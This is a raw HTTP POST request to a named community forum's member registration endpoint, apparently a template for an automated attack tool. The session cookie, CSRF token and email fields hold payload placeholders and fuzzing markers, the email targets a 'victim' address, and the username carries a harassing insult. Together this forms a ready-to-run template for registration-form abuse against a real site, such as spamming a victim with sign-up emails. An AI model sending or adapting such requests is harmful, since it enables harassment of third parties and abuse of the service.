POST /member/register HTTP/2
Host: community.contentsquare.com
Cookie: Session=PAYLOAD3; cookiePrivacyLevel=required
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Gecko/20100101 Firefox/138.0
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 408
Origin: https://community.contentsquare.com
X-Requested-With: XMLHttpRequest

register%5Buser%5D%5Busername%5D=YOU'RE+SUCH+A+LOSER+$$$$$$&register%5Buser%5D%5Bemail%5D=victim$$$$$$%40gmail.com.PAYLOAD1&register%5Bcustomfield%5D%5B5%5D=a&register%5Bcustomfield%5D%5B6%5D=b&register%5Bcustomfield%5D%5B4%5D=c&register%5Buser%5D%5Bpassword%5D=Alex%402345$$$&register%5Bterms%5D=1&register%5Bemail_repeat%5D=&register%5Bis_invite%5D=&register%5B_token%5D=PAYLOAD2